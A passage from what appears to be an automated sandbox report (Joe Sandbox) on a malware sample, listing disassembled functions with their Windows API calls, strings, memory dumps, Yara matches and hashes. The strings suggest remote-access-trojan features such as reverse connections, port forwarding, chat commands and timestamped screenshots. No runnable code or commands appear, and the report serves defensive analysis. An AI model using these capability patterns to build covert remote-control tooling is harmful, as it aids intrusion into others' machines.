                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$CloseConsoleErrorLastMode
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$Po$Po$called `Result::unwrap()` on an `Err` value$xJo
                                                                                                                                                                • API String ID: 1170577072-1019422048
                                                                                                                                                                • Opcode ID: 1eeb953b36ca0d6c30a973971ba8b0ead987fb5a54ae2882d4e71a1d953d5b42
                                                                                                                                                                • Instruction ID: 88bed7024994e5ccba1cf747cfd64a50c37bfa1ec77db39698b74de7d723367b
                                                                                                                                                                • Opcode Fuzzy Hash: 1eeb953b36ca0d6c30a973971ba8b0ead987fb5a54ae2882d4e71a1d953d5b42
                                                                                                                                                                • Instruction Fuzzy Hash: 4FA1A174D04298DBDB20CFA8C840BEEBFBAEF06314F24455AE455BB381DB35A945CB61
                                                                                                                                                                Function 000655D9 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetEvent.KERNEL32(?,?), ref: 000655F8
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 000656A8
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 000656B7
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 000656C2
                                                                                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,000D1F58), ref: 0006577A
                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 000657B2
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                • API String ID: 2956720200-749203953
                                                                                                                                                                • Opcode ID: 4c0fe178e854c091b282dbba73b285c3f1e75cc1be9b9abd0d3f4f66e1b3c23d
                                                                                                                                                                • Instruction ID: 81de1e533ef48e70c855e9856ee0def6c87fa28067642e370d0fb516ab8d4c60
                                                                                                                                                                • Opcode Fuzzy Hash: 4c0fe178e854c091b282dbba73b285c3f1e75cc1be9b9abd0d3f4f66e1b3c23d
                                                                                                                                                                • Instruction Fuzzy Hash: 0141BD71608701ABD714FB74DC4ADEE77EAAB85700F404A2CF94687196EF39CA04C792
                                                                                                                                                                Function 0259321F Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: 220d2afd9c82e6368d6ce5b433ee876d9bfaf2b4f8ec301b8003cc35818b91e9
                                                                                                                                                                • Instruction ID: 7d4454db7b2d7385fb7fb3538c5a9da40082f225d3a390060b1f6dbd996f8228
                                                                                                                                                                • Opcode Fuzzy Hash: 220d2afd9c82e6368d6ce5b433ee876d9bfaf2b4f8ec301b8003cc35818b91e9
                                                                                                                                                                • Instruction Fuzzy Hash: AA11A77591151ABFCF05EF54CD41CDA3B66FF443A0F418095F9184B121DA35DA50AFC4
                                                                                                                                                                Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 100059EA
                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                • _free.LIBCMT ref: 100059F6
                                                                                                                                                                • _free.LIBCMT ref: 10005A01
                                                                                                                                                                • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                • _free.LIBCMT ref: 10005A17
                                                                                                                                                                • _free.LIBCMT ref: 10005A22
                                                                                                                                                                • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                • _free.LIBCMT ref: 10005A38
                                                                                                                                                                • _free.LIBCMT ref: 10005A43
                                                                                                                                                                • _free.LIBCMT ref: 10005A51
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                Function 6FE94496 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6FE945B5
                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6FE946C3
                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6FE94815
                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6FE94830
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                • String ID: csm$csm$csm$*;
                                                                                                                                                                • API String ID: 2751267872-3292237783
                                                                                                                                                                • Opcode ID: 330513772ea58250cd6feac8220a33c5136b6434c79179984c669484259410c3
                                                                                                                                                                • Instruction ID: 4e9e6022592680b0a5868672bc6b3498e63a51f721dbcf7bb0b9677b32d30e56
                                                                                                                                                                • Opcode Fuzzy Hash: 330513772ea58250cd6feac8220a33c5136b6434c79179984c669484259410c3
                                                                                                                                                                • Instruction Fuzzy Hash: A0B136B1805319EFCF19DFA4C98099EBFB5BF05318B20815BE8246B351D731EA61CBA1
                                                                                                                                                                Function 6FE7CAF0 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 239windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 6FE7CB56
                                                                                                                                                                • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,?,00000800,00000000), ref: 6FE7CB83
                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000800,00000000), ref: 6FE7CC07
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFormatHandleLastMessageModule
                                                                                                                                                                • String ID: Ho$NTDLL.DLL$`o%$assertion failed: self.is_char_boundary(new_len)/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\alloc\src\string.rs$wo
                                                                                                                                                                • API String ID: 1273946083-4038519363
                                                                                                                                                                • Opcode ID: 5736a4d4249268e60c718474fb3e8bae8935b4da7265bd8dd461cc890419b78f
                                                                                                                                                                • Instruction ID: 8587d350205e0c09c7270d149f76b0200149c8c4a19a92375d06a9f777602295
                                                                                                                                                                • Opcode Fuzzy Hash: 5736a4d4249268e60c718474fb3e8bae8935b4da7265bd8dd461cc890419b78f
                                                                                                                                                                • Instruction Fuzzy Hash: C491C175E007188BDB25CFA8C894BEDBFF9AF46314F20422AE9156B280DB356945CB91
                                                                                                                                                                Function 000782A6 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • __EH_prolog.LIBCMT ref: 000782AB
                                                                                                                                                                • GdiplusStartup.GDIPLUS(000D1AA4,?,00000000), ref: 000782DD
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00078369
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 000783EF
                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 000783F7
                                                                                                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 000784E6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTimechar_traits
                                                                                                                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                • API String ID: 1145660553-3790400642
                                                                                                                                                                • Opcode ID: 84e937560d8ca5eb168647f1bc779316fed7700ce7a75dcfaef7b437316a0fd9
                                                                                                                                                                • Instruction ID: ac9f3df7972c2019ac07547caffc6112d28c28795fa8b09833716e14f68fb697
                                                                                                                                                                • Opcode Fuzzy Hash: 84e937560d8ca5eb168647f1bc779316fed7700ce7a75dcfaef7b437316a0fd9
                                                                                                                                                                • Instruction Fuzzy Hash: 73519070E002599ADB44FBB4CC56AFE77AAAF55300F044039F44AA7283EF388E45C7A4
                                                                                                                                                                Function 0006A2C4 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 162sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00001388), ref: 0006A2DD
                                                                                                                                                                  • Part of subcall function 0006A213: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0006A2EA), ref: 0006A249
                                                                                                                                                                  • Part of subcall function 0006A213: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0006A2EA), ref: 0006A258
                                                                                                                                                                  • Part of subcall function 0006A213: Sleep.KERNEL32(00002710,?,?,?,0006A2EA), ref: 0006A285
                                                                                                                                                                  • Part of subcall function 0006A213: CloseHandle.KERNEL32(00000000,?,?,?,0006A2EA), ref: 0006A28C
                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0006A319
                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0006A32A
                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0006A341
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0006A3BF
                                                                                                                                                                  • Part of subcall function 0007A6EF: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,0006A3E4), ref: 0007A70C
                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,000C8878,?,00000000,00000000,00000000,00000000,00000000), ref: 0006A4C8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                • String ID: 8!$8!
                                                                                                                                                                • API String ID: 3795512280-3313943414
                                                                                                                                                                • Opcode ID: 47763598e465d15b0fcbb9d0f00bcd454a5cba5d4075f0c0fb507acb20fc852c
                                                                                                                                                                • Instruction ID: 70a164f0f3023a935d15aa60f94d685c2f94c4eae9df9582bb822fcb7ab4eaf5
                                                                                                                                                                • Opcode Fuzzy Hash: 47763598e465d15b0fcbb9d0f00bcd454a5cba5d4075f0c0fb507acb20fc852c
                                                                                                                                                                • Instruction Fuzzy Hash: 3D519C3170860057EB19FB70CC66AEE779BAFD1300F08452DB546A72D3DF699A04C7A2
                                                                                                                                                                Function 6FEA4D80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 93memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • InitOnceBeginInitialize.KERNEL32(?,00000000,00000000,00000000,?,?,6FE80194), ref: 6FEA4DAA
                                                                                                                                                                • TlsAlloc.KERNEL32(?,6FE80194), ref: 6FEA4DC2
                                                                                                                                                                • InitOnceComplete.KERNEL32(?,00000000,00000000,?,6FE80194), ref: 6FEA4DF2
                                                                                                                                                                • TlsAlloc.KERNEL32(?,?,6FE80194,6FED31B8,6FE80A00,FFFFFFFF,?,6FE7AF6E), ref: 6FEA4DFC
                                                                                                                                                                • TlsFree.KERNEL32(6FE80A00,?,6FE80194,6FED31B8,6FE80A00,FFFFFFFF,?,6FE7AF6E), ref: 6FEA4E27
                                                                                                                                                                • InitOnceComplete.KERNEL32(?,00000004,00000000,00000000,6FEAE640), ref: 6FEA4E5A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitOnce$AllocComplete$BeginFreeInitialize
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$1o
                                                                                                                                                                • API String ID: 977713646-704842508
                                                                                                                                                                • Opcode ID: 633da77b0c97d68781304f7ee0fc196f4612e5538239368d75fc6d0418cdb323
                                                                                                                                                                • Instruction ID: 29a8e17a264e9c2fb530d7ca5738675b497b889702bffc6c1f756fa4a2636b5c
                                                                                                                                                                • Opcode Fuzzy Hash: 633da77b0c97d68781304f7ee0fc196f4612e5538239368d75fc6d0418cdb323
                                                                                                                                                                • Instruction Fuzzy Hash: 5D316E709002199BDF11CFA8C8497EEBFB4FB46318F20851AE164BE390DB766445CFA5
                                                                                                                                                                Function 000A9225 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 64a49cc2a2ff15042df8dd6850ee684fb2d65a9c12c6b4b0c14a7b61d3984ba7
                                                                                                                                                                • Instruction ID: 986fd31cd427f9fc88b9c529e08e321e24362f83aa1c90a38b2a949146622237
                                                                                                                                                                • Opcode Fuzzy Hash: 64a49cc2a2ff15042df8dd6850ee684fb2d65a9c12c6b4b0c14a7b61d3984ba7
                                                                                                                                                                • Instruction Fuzzy Hash: E2C1AE70E04245AFDF12DFE8D841BEEBBF4AF5A310F184198E854A7292DB349942CB61
                                                                                                                                                                Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1454806937-0
                                                                                                                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                Function 0259422F Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$_abort_memcmp
                                                                                                                                                                • String ID: C
                                                                                                                                                                • API String ID: 137591632-1037565863
                                                                                                                                                                • Opcode ID: 65b6dfeed970d30f29b561820a0c73ec9e978bf76f6e83e0adf15eddcf8448bd
                                                                                                                                                                • Instruction ID: 1d57f5520dd35a74221dceddaffcd19fc34e3816b6132d172975f3ca6f1befd9
                                                                                                                                                                • Opcode Fuzzy Hash: 65b6dfeed970d30f29b561820a0c73ec9e978bf76f6e83e0adf15eddcf8448bd
                                                                                                                                                                • Instruction Fuzzy Hash: C5C14975A0122A9FDF24DF28C884BADB7B5FF48314F5085AAD809A7350D771AE91CF84
                                                                                                                                                                Function 6FE748C0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6FE749C3
                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000002,00000000), ref: 6FE749CE
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE749DA
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE749EC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$EnvironmentVariable
                                                                                                                                                                • String ID: uo&$uo&
                                                                                                                                                                • API String ID: 2691138088-4100988267
                                                                                                                                                                • Opcode ID: e79c8c4c0cb493071adef1bd3502a4f024b148445924a07a23adb4f71e22d9a6
                                                                                                                                                                • Instruction ID: 223a4f45fcfdf44279fd4779cf71e5b17eeb234dc6fc5e7e264e74b3766406fa
                                                                                                                                                                • Opcode Fuzzy Hash: e79c8c4c0cb493071adef1bd3502a4f024b148445924a07a23adb4f71e22d9a6
                                                                                                                                                                • Instruction Fuzzy Hash: AA8170B1E00219DBDB208FA8D845BDDBFB5FF45318F24412AE814B7340EB75A954CB91
                                                                                                                                                                Function 0007001D Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Eventinet_ntoa
                                                                                                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                                                                                • API String ID: 3578746661-168337528
                                                                                                                                                                • Opcode ID: 97654dcdd13d0928d0830d68fc649d03cc2cdcd550a9de1e2076be80035f5ddb
                                                                                                                                                                • Instruction ID: bd9509a0512381a1586f51e469e384c03e93f8efb54ec29f7d831ce3d23a0910
